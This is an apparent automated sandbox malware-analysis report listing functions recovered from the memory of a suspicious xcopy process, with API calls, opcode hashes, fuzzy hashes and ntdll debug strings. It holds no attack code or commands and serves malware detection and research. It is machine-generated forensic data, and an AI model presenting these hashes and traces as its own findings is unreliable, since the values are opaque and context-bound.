                                  • Instruction ID: 77e80f4a2be0014920679e1f133da3ffebbcbd3d95a3df77d4d158bab5c1eefa
                                  • Opcode Fuzzy Hash: 5017eacf575fa66b987127cbb462bddf0181e3326ae4c73234eae0b8cd340783
                                  • Instruction Fuzzy Hash: 7E011EB5D0020DBBDB14EAE4DC41FDDB7B99B54348F104295EE0A97280FA71EB58CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F57D60 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,02F47683,00000010,?,?,?,00000044,?,00000010,02F47683,?,?,?), ref: 02F57DC0
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: e3dc350ad7992f4025265e86a9489379d97c063344347db72ca276ed82ed7fd2
                                  • Instruction ID: 1feb720578d380b337494850ed4955e3bb62d3ca34eace0cc3834a004b67ae04
                                  • Opcode Fuzzy Hash: e3dc350ad7992f4025265e86a9489379d97c063344347db72ca276ed82ed7fd2
                                  • Instruction Fuzzy Hash: 030180B2214209BBCB54DE99DC80EEB77ADAF8D754F518208BA0DE3241D630FC518BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F43D63 Relevance: 1.5, APIs: 1, Instructions: 40libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02F43DE2
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 503d6485935eb4409dc0c3fc89d33c7c8b512331a68711aae755ee587567018a
                                  • Instruction ID: c98ddfe37884f026397901a13f7774d434ad309f4689f4dc80d986950d71d1e9
                                  • Opcode Fuzzy Hash: 503d6485935eb4409dc0c3fc89d33c7c8b512331a68711aae755ee587567018a
                                  • Instruction Fuzzy Hash: CFF062B5E4010EABDF14DA94DC45FD9B7B8AB44308F1081A5EE0D9B280FA70EA598B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F39380 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F393C5
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 31223e0a56c9cf10eb80e593067b4cddbcc508904d54e0c6505bb47df1f57bed
                                  • Instruction ID: 2b5de52bb574b160b618716da61a0b10b8a30cf73052651a25b71c88616abe33
                                  • Opcode Fuzzy Hash: 31223e0a56c9cf10eb80e593067b4cddbcc508904d54e0c6505bb47df1f57bed
                                  • Instruction Fuzzy Hash: E6F0657338031436E32065AAEC02FDB729C9B85BA1F150426FB0CEB1C0D9D1B40146E4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F57CD0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,0B08E2C1,00000007,00000000,00000004,00000000,02F43649,000000F4,?,?,?,?,?), ref: 02F57D0C
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: 2a10095c7dd2379ca1bfe23ab2d869ab752011713d8de6f1dda4298a7a590373
                                  • Instruction ID: 2e6ff25d8090cede90961573c52ddcaaa0d0a2577b432fe9621225e875bdbe8a
                                  • Opcode Fuzzy Hash: 2a10095c7dd2379ca1bfe23ab2d869ab752011713d8de6f1dda4298a7a590373
                                  • Instruction Fuzzy Hash: 34E06D712002147BCA10EE59DC40FDB37AEEFC9750F004409FA09A7241C630B8108AB9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F57C80 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlAllocateHeap.NTDLL(02F40FA9,?,02F545CF,02F40FA9,02F53FF7,02F545CF,?,02F40FA9,02F53FF7,00001000,?,?,02F59550), ref: 02F57CBF
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: fc8b3c178ccdfb88de354c7e46c3f6b4553945cf9241886c4d3a36b578cca239
                                  • Instruction ID: f1ad4130096eafc8762a8c202d44d1512e80688d7417966e5b3089b60695aabf
                                  • Opcode Fuzzy Hash: fc8b3c178ccdfb88de354c7e46c3f6b4553945cf9241886c4d3a36b578cca239
                                  • Instruction Fuzzy Hash: 65E065722102087BD620EE59DC44FEB33ADEFCA760F004029FA09A7240DA30B8108AB5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F476C0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileAttributesW.KERNELBASE(?), ref: 02F476EC
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: ef759eb556e0dccce8e8eda891e97e72bc6b72576dfc634ff8ce8142eb1d2185
                                  • Instruction ID: f7b550ce79d68e51e33e613c6e7f5d833db28a6b12717429a6436c412fdbdc87
                                  • Opcode Fuzzy Hash: ef759eb556e0dccce8e8eda891e97e72bc6b72576dfc634ff8ce8142eb1d2185
                                  • Instruction Fuzzy Hash: 2AE0263164030C27FB207ABCDC45F6637498B48768F284660BA1CDB2D1FFB8F4024690
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F474C7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,02F41290,02F56717,02F53FF7,?), ref: 02F47503
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 228e171aa417770b844fc4500a1d0b7488ef939e3cac1194d3877d5fd3a7b548
                                  • Instruction ID: 1ef3089cb86d1956589b30d21c735ec4fec75f6c76c2fe36f0d16faeda53cd57
                                  • Opcode Fuzzy Hash: 228e171aa417770b844fc4500a1d0b7488ef939e3cac1194d3877d5fd3a7b548
                                  • Instruction Fuzzy Hash: 1EE0C2713802083BF600B6A5CC46F47364D9B053B4F058464FA4CEB2C2EA62F1008AA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F474D0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,02F41290,02F56717,02F53FF7,?), ref: 02F47503
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: ae31f3cd9172aff2314a4b4e4396ca7be35de29213c0b4175995c50ee17a9a91
                                  • Instruction ID: 9a8997abece41ba28843804de2fa59b751a199e2c2b6a44915267dc0d2b1cae4
                                  • Opcode Fuzzy Hash: ae31f3cd9172aff2314a4b4e4396ca7be35de29213c0b4175995c50ee17a9a91
                                  • Instruction Fuzzy Hash: 1ED05E716803083BF600A6A5CD06F16328D5B457A4F058464FB4CEB2C2EDA6F10086A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03922C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: e0d3c395639694866ac7dc845fc11cfb8155f42fed0f70885cb23a79776bd885
                                  • Instruction ID: 9aa265a707194c17db976279ef81c682fabbe7cf3295cd78f5aa45c5892c51dc
                                  • Opcode Fuzzy Hash: e0d3c395639694866ac7dc845fc11cfb8155f42fed0f70885cb23a79776bd885
                                  • Instruction Fuzzy Hash: 94B02B718019C4C5EA00E320060C7073D0867C0300F19C0A1E2034241E0738C0C0F171
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 0395D1C0 Relevance: .1, Instructions: 135COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                  • Instruction ID: 4ca9f1c3823cbee7e9676c5b4b86c01a0c4a7a7d248ffe36cdbd663ea6938b77
                                  • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                  • Instruction Fuzzy Hash: 94510775A04206DFCB18CF69C5816AAFBF5FB48314B18856EE819A7345E734EA90CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03922890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 71d98fe0280a11b963c5e8ac4ab802ae3b13111d2fb0808ee18380fd8bd1af44
                                  • Instruction ID: 7f97f70fb92c0a32006e529ccf17c6c1982fa7c3d877b4351af333e02a760a32
                                  • Opcode Fuzzy Hash: 71d98fe0280a11b963c5e8ac4ab802ae3b13111d2fb0808ee18380fd8bd1af44
                                  • Instruction Fuzzy Hash: B8513BB5A005267FCB61DF98898097EFBBCBB492407148669E8A5D7745D334DE40C7E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03917630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                  Download Yara Rule
                                  Strings
                                  • ExecuteOptions, xrefs: 039546A0
                                  • Execute=1, xrefs: 03954713
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03954742
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 03954787
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 039546FC
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03954725
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03954655
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: d63545e97866eacdf66b0aa2c0da26ffb6c75e9666f809e822782c777a40f7e5
                                  • Instruction ID: 842eb26770229b8b79f7890791acea7b4cb96ff26e1b77017a43bf2cce4fc59d
                                  • Opcode Fuzzy Hash: d63545e97866eacdf66b0aa2c0da26ffb6c75e9666f809e822782c777a40f7e5
                                  • Instruction Fuzzy Hash: 2D511735A0131E6ADF10EAE9EC99FAD77ACAF44340F0404D9E505BB181EB719AA1CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0392B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction ID: 78d449958af5a14375954723905aa2b95dabb720f214b88744bb622d88097eaf
                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction Fuzzy Hash: 4A81E030E01A699EDF24DE68C8907FEBFFAAF443A0F1C4559D861A7799C7348840CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0390F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 039502E7
                                  • RTL: Re-Waiting, xrefs: 0395031E
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 039502BD
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: ff9e061911001b03da3dad1188d39b148de3ecc017cefe6e0c9ed39f76eb75f6
                                  • Instruction ID: 5dc7a7bd05cd646518945763c696c64da0a6019218730ee651b04f2f2bf0f5d1
                                  • Opcode Fuzzy Hash: ff9e061911001b03da3dad1188d39b148de3ecc017cefe6e0c9ed39f76eb75f6
                                  • Instruction Fuzzy Hash: 11E1BE316087419FD724CF28C884B2AB7E8BF84754F180A5DF8A68B3E1D774DA85CB42
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0391BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03957B7F
                                  • RTL: Re-Waiting, xrefs: 03957BAC
                                  • RTL: Resource at %p, xrefs: 03957B8E
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  • Opcode ID: 2a93d514a25112f4f7181eb083ea15ed376087c2497a1a8993f99d89e624ffd5
                                  • Instruction ID: d5324b1e4324debcc84d216ec792a0af2c773969215745e9e63ea47fa02e3e31
                                  • Opcode Fuzzy Hash: 2a93d514a25112f4f7181eb083ea15ed376087c2497a1a8993f99d89e624ffd5
                                  • Instruction Fuzzy Hash: 0E4111353017069FD720DE69C840B6AB7EAEF88720F040A1DF85AEB780DB30E955CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0391B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0395728C
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 039572C1
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03957294
                                  • RTL: Resource at %p, xrefs: 039572A3
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  • Opcode ID: a2197ae521624c85731c9e8e3309763c79d91ad66f01636f5c41138698c6bb14
                                  • Instruction ID: 0efc26e136458058a2496efd6bf1fbd7ec908724779c011ef845aa7855f383af
                                  • Opcode Fuzzy Hash: a2197ae521624c85731c9e8e3309763c79d91ad66f01636f5c41138698c6bb14
                                  • Instruction Fuzzy Hash: E541FF3570030AABD720CE65CC41B6AB7AAFF84750F144A19FC56EB280DB31E992CBD0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03927D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction ID: 985f398a928344f602fee8f338ce639c6e69c46f255d1b48532fe9f7018ae475
                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction Fuzzy Hash: A291E470E04A369BDF24DEA9C8816FEBFA9FF44360F18451AE865F72D9D73089408760
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 038E9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$@
                                  • API String ID: 0-1194432280
                                  • Opcode ID: b2247c6ca4f943f431fc3f4ca6fe725840a3a414225a08597ab981ce9e537dd5
                                  • Instruction ID: ae28a33430ee5d3f9a6364e16834cf1b458f9baabb068ca697314bedc7cc78bd
                                  • Opcode Fuzzy Hash: b2247c6ca4f943f431fc3f4ca6fe725840a3a414225a08597ab981ce9e537dd5
                                  • Instruction Fuzzy Hash: C3813975D002699BDB31DB94CC44BEEB7B8AB49750F0445EAEA19F7280D7749E80CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0396CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                  Download Yara Rule
                                  APIs
                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 0396CFBD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: CallFilterFunc@8
                                  • String ID: @$@4Cw@4Cw
                                  • API String ID: 4062629308-3101775584
                                  • Opcode ID: 55c02d7e58b5cd2893d9d5db1c93c17cc7c7cab568daf623b4b5ddc44bb1a95f
                                  • Instruction ID: 8ab79780ce406acb1be649480ac77f719b49c271f972305d7bca55f27a6bc51b
                                  • Opcode Fuzzy Hash: 55c02d7e58b5cd2893d9d5db1c93c17cc7c7cab568daf623b4b5ddc44bb1a95f
                                  • Instruction Fuzzy Hash: 0841BF79A01718DFCB21DFA9C940AAEBBB8FF85B00F04846AE925DF254D774C841CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%